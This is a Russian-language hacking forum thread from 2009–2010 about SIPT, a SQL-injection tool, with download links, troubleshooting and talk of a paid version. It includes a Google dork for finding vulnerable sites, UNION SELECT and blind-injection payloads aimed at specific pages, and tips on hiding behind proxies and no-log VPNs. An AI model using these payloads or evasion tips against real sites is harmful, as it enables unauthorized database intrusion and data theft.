ЕСЛИ КТО ТО УМЕЕТ РЕАЛЬНО КОДИТЬ, ИМЕЕТ ВРЕМЯ НА ЭТО И ГЛАВНОЕ ХОЧЕТ ДОДЕЛАТЬ ПРОГУ -> МОЖЕТ ОБРАЩАТСЯ КО МНЕ В АСЮ

Fuckel
04.09.2009, 11:29
да перезалей, может пригодится )

*DeViL*
05.09.2009, 00:35
перезалей

Shadrin
05.09.2009, 04:51
http://depositfiles.com/files/zz33ew0rp

Byrger
16.09.2009, 16:35
Я вот долго искал и не нашёл как запустить SIPT 4 через прокси...
Может подскажите?

mr. ZetRikS
18.09.2009, 00:49
Я вот долго искал и не нашёл как запустить SIPT 4 через прокси...
Может подскажите?

Есть софт который пускает весь трафф через прокси...

Читать ТУТ: https://forum.antichat.ru/thread59478-proxy.html

2Fed123
25.09.2009, 17:25
Как использовать прогу для инъекций через POST,ненадо скидывать ссылку на мануал-ибо там про пост написано 2 предложения в которых нет норм объяснения

Disabled
26.09.2009, 03:01
Отличная шняга, особенно для 5.х.
Для четвертой версии приходиться перебирать таблицы с помощью программы.

inurl:"news.php?id=" "You have an error in your SQL syntax" -- Запрос для гугля.
Далее по накатанной :
+union+select+null,null,null+from+table1/*

http://who-cs.ru/img/images/obyybdgp81x518t9ppkb_thumb.jpg (http://who-cs.ru/img/viewer.php?file=obyybdgp81x518t9ppkb.jpg)
http://who-cs.ru/img/images/bfxv27ajp4j36q74rhu_thumb.jpg (http://who-cs.ru/img/viewer.php?file=bfxv27ajp4j36q74rhu.jpg)
http://who-cs.ru/img/images/wqf1d3wl4vmjl2fsg36i_thumb.jpg (http://who-cs.ru/img/viewer.php?file=wqf1d3wl4vmjl2fsg36i.jpg)
http://depositfiles.com/files/v8avnanot

2Fed123
01.10.2009, 14:10
Проблемка при проведении слепой инъекции-Key определился,все норм,но когда жму Get result,то постоянно говорит что 1 и последующие символы =37
printerfriendlynews.php?newsid=164831+AND+ASCII(SU BSTRING((user(),1,1),1,1))=37--
printerfriendlynews.php?newsid=164831+AND+ASCII(SU BSTRING((user(),2,1),1,1))=37--

HAXTA4OK
04.10.2009, 16:15
почему вылетает ошибка когда я нажимаю проверить

Run-time error '35756':

Unable to complete request и потом вылетает

Ctacok
04.10.2009, 18:59
почему вылетает ошибка когда я нажимаю проверить

Run-time error '35756':

Unable to complete request и потом вылетает
Смени Request Type на GET
и Injection Type на URL

SQLHACK
04.10.2009, 21:53
возможно что то блочит доступ к инету. вообще такое редко бывает , но бывает, обычно от того что инета нет , хотя там стоит проверка,

HAXTA4OK
06.10.2009, 22:19
Проблема решена путем : деинсталяции (не просто удаление кнопочкой DELETE, а через установку/удаление программ)

Причина как я понял была в том что при установки просит заменить какие то библиотеки в windows папке(вроде в Windiws точно не помню) :) не рискнул - нажал нет, вот и косячило, а потом когда заново устанавливал, нажал да :) теперь пашет

almazz
24.10.2009, 19:06
как скачать то отсюда? ttp://dbattack.com/files/setup.sipt4.rar

[i]
24.10.2009, 19:34
никак, домен отвязан от старого хоста

ReduKToR
02.11.2009, 22:10
кто поделится третьей версией???

fker
02.11.2009, 22:33
http://slil.ru/28154663

YuNi|[c
07.11.2009, 13:00
Отличная шняга, особенно для 5.х.
Для четвертой версии приходиться перебирать таблицы с помощью программы.

inurl:"news.php?id=" "You have an error in your SQL syntax" -- Запрос для гугля.
Далее по накатанной :
+union+select+null,null,null+from+table1/*

http://who-cs.ru/img/images/obyybdgp81x518t9ppkb_thumb.jpg (http://who-cs.ru/img/viewer.php?file=obyybdgp81x518t9ppkb.jpg)
http://who-cs.ru/img/images/bfxv27ajp4j36q74rhu_thumb.jpg (http://who-cs.ru/img/viewer.php?file=bfxv27ajp4j36q74rhu.jpg)
http://who-cs.ru/img/images/wqf1d3wl4vmjl2fsg36i_thumb.jpg (http://who-cs.ru/img/viewer.php?file=wqf1d3wl4vmjl2fsg36i.jpg)
http://depositfiles.com/files/v8avnanot
ты тут про sqliHelper 2.7???
Да если на дб лимит прав на юзера типа:
Access denied for user 'блаблабла'@'localhost'
только sipt4 может обойти имей ввиду, а с 5ой версии взят с information_schema.tables/columns я и ручками могу.
Так что sipt4 рулит

YuNi|[c
07.11.2009, 13:43
http://pic.ipicture.ru/uploads/090312/50lBAcHRq4.jpg (http://ipicture.ru/)
где ты взял эту версию вед 4ая версия не поддерживает проксю и интерфейс тоже немного другой! Может кто нит зальет эту версию?

GenTao
23.11.2009, 16:26
Сегодня заметил,что SIPT 4 может искать даже без указания ключа поиска(в случае UNION-а).Маленькое открытие для себя...)

Pashkela
23.11.2009, 20:05
SIPT уже вошел в историю хакинга так или иначе. Творцу за огроменный труд - огроменный риспект. Но устарело, к сожалению. Нужно развитие.

YuNi|[c
23.11.2009, 22:41
это я много раз так ищу когда лень, просто оставлю путыс и выбираю not found

YuNi|[c
24.11.2009, 00:19
del

Exploit393
28.11.2009, 22:59
Самое прикольное в этой проге то, что она написана на Visual Basic 6 :D

SQLHACK
28.11.2009, 23:16
а в чем проблема то ?
ну вот пятая на QT пишется

LzD
28.11.2009, 23:30
а в чем проблема то ?
qt 4: Программирование GUI на С++ Изд. 2-е
http://www.onlinedisk.ru/file/257087/
может быстрее дело пойдет :(

SQLHACK
29.11.2009, 00:49
врядли

Exploit393
29.11.2009, 02:01
а в чем проблема то ?

Да вот ни в чём, просто язык этот ужасный, но глядя на прогу, сразу видно что автор - мастер.

shellz[21h]
29.11.2009, 15:18
Версия будет паблик?
Как я понимаю с++ и QT выбран для кроссплатформенности

LzD
29.11.2009, 17:17
']Версия будет паблик?
Как я понимаю с++ и QT выбран для кроссплатформенности
ясен хер что паблик, иначе смысл какой? во вторых этим занимается не один человек, ну и в третьих- ога кросплаформенность, а то под никсами то нечем :D

SQLHACK
29.11.2009, 18:24
Версия будет паблик?
Паблик, но есть возможность что будет несколько версий в том числе и платная)
Кроссплатформенная, но вообще и 3 и 4ая версия прекрасно себя чувствовали под Wine.

root_sashok
29.11.2009, 21:23
О, если будет пятая на QT, можно не мучаться с эмуляторами...

shellz[21h]
30.11.2009, 00:10
замечательная новость.

LokbatanLi
09.12.2009, 07:51
а у меня линк не работался

StarFire
10.12.2009, 11:45
перезалейте :( plz

ByGreez
10.12.2009, 14:40
Прога работает отлично !! Вот только хотелось под linux....
Ссылка рабочая есть выше!
Но по мне лучше всё руками перебирать, так как-то приятнее получается =)

YuNi|[c
10.12.2009, 18:03
так 5ая версия вышла или готовится еще?

SQLHACK
10.12.2009, 21:33
Прога работает отлично !! Вот только хотелось под linux....
Ссылка рабочая есть выше!
Но по мне лучше всё руками перебирать, так как-то приятнее получается =)

Под Wine идет

так 5ая версия вышла или готовится еще?

Готовится

FlameKiller
11.12.2009, 02:39
что делать если при нажатии на кнопку Check GET --> Post параметры Injectoin type \ Request type меняються на Post / PostData ?
Мне не они нужны ...

SQLHACK
11.12.2009, 11:41
ыыыыыыаАаааа, вот отжег)
А собственно зачем ты нажимаешь эту кнопку если она тебе не нужна.

LokbatanLi
11.12.2009, 15:32
если у ково есть перезалейте в рапид// please

jenyavlg
11.12.2009, 17:04
http://rapidshare.com/files/319385590/sipt4.rar.html

FlameKiller
11.12.2009, 18:07
ыыыыыыаАаааа, вот отжег)
А собственно зачем ты нажимаешь эту кнопку если она тебе не нужна.
а как сканирование запустить то?))

YuNi|[c
12.12.2009, 04:10
если новая 5ая версия готовится тогда думаю не только мускул будеть

b3
20.12.2009, 22:16
Немогу запустить тулзу через Фрикап на вин7, кто что посоветует?

SQLHACK
21.12.2009, 11:49
впн без логов

Nek1t
22.12.2009, 02:44
Под Win7 SIPT4 работает?

Amoura
22.12.2009, 02:49
Под Win7 SIPT4 работает?
да. нормально работает.

shellz[21h]
22.12.2009, 05:26
Немогу запустить тулзу через Фрикап на вин7, кто что посоветует?
proxifier

YuNi|[c
24.12.2009, 04:57
вес еще нету пятой ветки! Хорошо бы если под новый год выйдет

SQLHACK
24.12.2009, 14:54
думаю в январе если все пойдет нормально, но возможно она будет платной, из-за того что привлечен сторонний програмист.

YuNi|[c
30.12.2009, 17:36
думаю в январе если все пойдет нормально, но возможно она будет платной, из-за того что привлечен сторонний програмист.
блин я за что будеть платной но главное поддержал не тока мускул

Deathdreams
30.12.2009, 19:05
У меня одного сайт с софтом не работает?

Roston
30.12.2009, 22:09
Распиши что ты делаеш и мы тебе поможем... я убедился что тут не форум екстрасенсов

n4n0bit
31.12.2009, 00:44
Уважаемые, перезалейте пожалуйста sipt 4

YuNi|[c
31.12.2009, 11:04
Уважаемые, перезалейте пожалуйста sipt 4
пожалуйста
http://www.multiupload.com/EHULCGS1WA

.Life
31.12.2009, 19:21

YuNi|[c
01.01.2010, 17:14
какая разница откуда скачать, я перезалил то что я сам юзаю

.Life
01.01.2010, 20:33

хм, а ты откуда взял?

YuNi|[c
01.01.2010, 21:31
эта прога у меня давно и хз откуда скачал

RedX
13.01.2010, 21:06
Кто знает как с её помощью авторизоваться на сайте? Если уязвимость доступна только после логина?

YuNi|[c
13.01.2010, 23:20
Кто знает как с её помощью авторизоваться на сайте? Если уязвимость доступна только после логина?
тебе надо настроит все headers+куки

SQLHACK
16.01.2010, 17:03

Если авторизация через куки(Basic или cессия) просто логинишься например через FireFox с плагинов LiveHEader или DataTamper, или просто смотришь выданые тебе куки сайтом, в настройках кук, после авторизации и эти заголовки добавляешь в Header поле программы.

Spooky404
18.01.2010, 09:34

антивирь ругается, говорит что remote admin детектед.

SQLHACK
18.01.2010, 12:31
http://www.sendspace.com/file/63jupj
CRC32: 779D3353
MD5: AD56317BCAC799F0B32CA2C92100A7DC
SHA-1: 81FCBD582B1248596562415240CFC6E36AE67831

satana8920
20.01.2010, 21:32
error
Run-time error '35756'
unable to connect request
у кого такое было ?
прогу переставлял

xcedz
20.01.2010, 21:40
а че ман не выложишь в архив? был вроде раньше на сайте хороший ман.

YuNi|[c
20.01.2010, 21:44
прям ппц какой то если и в правду ремот админом прикреплен. Я его уже год узал на своей машине.
Ты каким антивирем проверил незнаю но у меня нод32 с последными обновами молчит :eek:

SQLHACK
21.01.2010, 01:38
http://www.virustotal.com/ru/analisis/789cba635eb2865ff42ef7bf7d288dcc4e7b4b7692bd1776b3 e07637bb95f8c9-1253581177
вот так выглядит нормальная версия, которую я выложил

УБИРАЕМ ПРОБЕЛЫ ИЗ УРЛ

xcedz
21.01.2010, 01:43
когда постишь указывай какой антвирь, версия итп. может у тебя смописный -хз :D

и откуда ты скачал фал? ;)

YuNi|[c
21.01.2010, 07:47
нифига ложный вызов, может у тя и вправду самописный антивир )))
Вот мои результаты:
http://www.virustotal.com/ru/analisis/789cba635eb2865ff42ef7bf7d288dcc4e7b4b7692bd1776b3 e07637bb95f8c9-1264045421

YuNi|[c
22.01.2010, 23:00
седня обратил внимание что на проге ф функциях BruteForce Attacking отключены из 4х 3:
More1Row
Sleep-Based
Benchmark
тока Standart включен

Если когда писалось прога такие функции не были изучены до конца тогда зачем добавлен, если были то зачем отключен или у меня крывая версия?

SQLHACK
24.01.2010, 13:14
седня обратил внимание что на проге ф функциях BruteForce Attacking отключены из 4х 3:
More1Row
Sleep-Based
Benchmark
тока Standart включен

Если когда писалось прога такие функции не были изучены до конца тогда зачем добавлен, если были то зачем отключен или у меня крывая версия?

Намеревалось сделать , но не было сделано.
Сейчас уже реальизовано в новой версии, но она пока не вышла.

YuNi|[c
24.01.2010, 15:52
бло бро ты уже скажал что выйдет в январе но все еще нету, там если можно добавьте все бд + проверка на нестандартные скули тоже чтоб ручками параметры настроили и запускали

SQLHACK
24.01.2010, 18:34
ну так первый билд уже тестируется в закрытых группах , будет и на вашей улице праздник!)

YuNi|[c
25.01.2010, 21:31
Версия будет паблик?
Паблик, но есть возможность что будет несколько версий в том числе и платная)
Кроссплатформенная, но вообще и 3 и 4ая версия прекрасно себя чувствовали под Wine.
из этого думал что прогу не тока на приват разделах постите, а что тут тоже можем тестировать
обидно тока

YuNi|[c
26.01.2010, 07:14
ладно поживем увидем, но некоторые рекомендации все таки отправил в личку

YuNi|[c
01.02.2010, 20:08
вы что то забыли про новую версию или больше не будем видет в паблике? Если нет то надо обьявит что будеть тока в привате

Chaak
01.02.2010, 22:40
Как там пятая версия поживает? :)

SQLHACK
02.02.2010, 01:32
Поживает, в паблике будет 4.x ветка

YuNi|[c
02.02.2010, 18:11
Поживает, в паблике будет 4.x ветка
нет в паблике уже есть 4х ветка, но что уже в привате решили не продавать даже для смертных??? Сами сказали что может быть платая версия, вот и постите цену и тд

Chaak
02.02.2010, 18:24
нет в паблике уже есть 4х ветка, но что уже в привате решили не продавать даже для смертных??? Сами сказали что может быть платая версия, вот и постите цену и тд
таким образом она уйдет в паблик

YuNi|[c
02.02.2010, 18:43
ну вед что плохого если продать прогу вед оплачивает финансы программиста и тд. И еще что плохого если прога уйдеть в паблик, вед если чел купил прогу так он не будеть выкладивать в паблик и если так не пойдет тогда сделайте персоналные билды и продайте. Все равно не надо просто так гнит в приват разделах такую прогу.

SQLHACK
05.02.2010, 00:52
ну вед что плохого если продать прогу вед оплачивает финансы программиста и тд. И еще что плохого если прога уйдеть в паблик, вед если чел купил прогу так он не будеть выкладивать в паблик и если так не пойдет тогда сделайте персоналные билды и продайте. Все равно не надо просто так гнит в приват разделах такую прогу.

Слушай, я тебе поясняю, прога переписывается, на данный момент есть супер плохой билд версии 4.5 , который лежит в привате , он отлаживается, как только он отладится - он будет в паблике, и будет поддерживать только MySQL и версия будет 4.x.x

Платная версия 5.x.x будет поддерживать также MSSQL, ACCESS, POSTGRE, ORACLE, DB2(возможно) , SYBASE(возможно) и БУДЕТ ПЛАТНОЙ!.

YuNi|[c
05.02.2010, 01:25
да понял я, уж думал пятая версия вообще не будеть выйти в паблик. Пусть платный но надо юзать такое чудище ))

YuNi|[c
14.02.2010, 01:38
так давайте уже 5ую ветку продать то

alexandros
20.02.2010, 17:22
как скачать? залейте куда нить

YuNi|[c
21.02.2010, 10:23
как скачать? залейте куда нить
это вроде автор залил
там 4версия, но чет автор забыл или передумал продать наверное ))

YuNi|[c
07.03.2010, 16:08
думаю sqlhack уже бросил разработку новый версий SIPT5 (хотя я уже истратил средства для покупки новой версии) но сказали будеть готово в январе. Пока что toolza от Pashkela рулит ))

Nek1t
10.03.2010, 00:57
Вопрос по SIPT4.
Есть иньекция в урле, но результат выводится в заголвках(headers). Как-нибудь можно заставить SIPT и их цеплять?

YuNi|[c
10.03.2010, 01:44
Вопрос по SIPT4.
Есть иньекция в урле, но результат выводится в заголвках(headers). Как-нибудь можно заставить SIPT и их цеплять?
да можно для этого надо выбрать в настройке:Injection type параметр:Header
и во вкладке Additiontal Header написать уязвимый параметр и добавить {SQLINJ}

Nek1t
10.03.2010, 02:03
YuNi|[c
Ты неправильно понял меня: уязвим параметр, передающийся в урле, а само уязвимое поле выводится в заголовках.

YuNi|[c
11.03.2010, 07:41
YuNi|[c
Ты неправильно понял меня: уязвим параметр, передающийся в урле, а само уязвимое поле выводится в заголовках.
я тебя понял, просто Request type надо оставит GET

SQLHACK
11.03.2010, 11:05
я тебя понял, просто Request type надо оставит GET

Отвечаю на последний вопрос, сипт не умеет цеплять ответы в хидерах.

А так же замечу что работа ведется, просто медленнее чем планировалось. Прогер занят на другом проекте.

Sams
12.03.2010, 12:16
Ошибка №1

http://i.piccy.info/i4/6d/47/08751977358c0b1bcade231218cd.jpeg

Насколько я понимаю, вызывается при событии OnChange почти любого текстового поля, выпадающего списка, а также некоторых кнопок. Почему оно не может сохранить файл конфигурации?! :confused:

Ошибка №2

http://i.piccy.info/i4/07/fb/01adc048241e3b200401f7ef01ec.jpeg

Вызывается при загрузке структуры дерева "Edit By Hand - Load All Struct - Submit changes"
Структуру указываю правильную, тобишь предварительно сохраненную при помощи "Save for programm"

YuNi|[c
12.03.2010, 14:27
Ошибка №1

http://i.piccy.info/i4/6d/47/08751977358c0b1bcade231218cd.jpeg

Насколько я понимаю, вызывается при событии OnChange почти любого текстового поля, выпадающего списка, а также некоторых кнопок. Почему оно не может сохранить файл конфигурации?! :confused:

Ошибка №2

http://i.piccy.info/i4/07/fb/01adc048241e3b200401f7ef01ec.jpeg

Вызывается при загрузке структуры дерева "Edit By Hand - Load All Struct - Submit changes"
Структуру указываю правильную, тобишь предварительно сохраненную при помощи "Save for programm"
ну это ошибка уже давно известно, придется просто не юзать ту функцию или в новых версиях может такого не будеть

Sams
13.03.2010, 15:18
Проблему с сохранением файла конфигураций решила переустановка SIPT'а.

GOGA075
16.05.2010, 02:01
А у меня такая проблема
http://i.piccy.info/i5/10/89/108910/1111.jpg
когда начинаю подбирать таблицы на mysql 4 то вылитает это...

Как сделать штобы это работало....

shell_c0de
16.05.2010, 02:16
Указать правильный путь к файлу tables.txt )

GOGA075
16.05.2010, 02:29
shell_c0de
А где его указывать надо то?

2fed
16.05.2010, 20:32
shell_c0de
А где его указывать надо то?
na proge. Tam je vse est'.

YuNi|[c
17.05.2010, 00:35
чет вышел уже хавий 1.09 версия с поддержкой вывода через ошибок но наш сипт5 задерживается

ReckouNT
17.05.2010, 08:44
Что то по линку, который в первом посте, не скачивается.

b82a
17.05.2010, 09:18
Что то по линку, который в первом посте, не скачивается.

dingolaki
16.06.2010, 16:51
Что то при установке эта прога выбивает ошибку!!!

IMMORTAL_S
16.06.2010, 19:34
Можно ли исходники получить..? Хочется под себя "настроить":)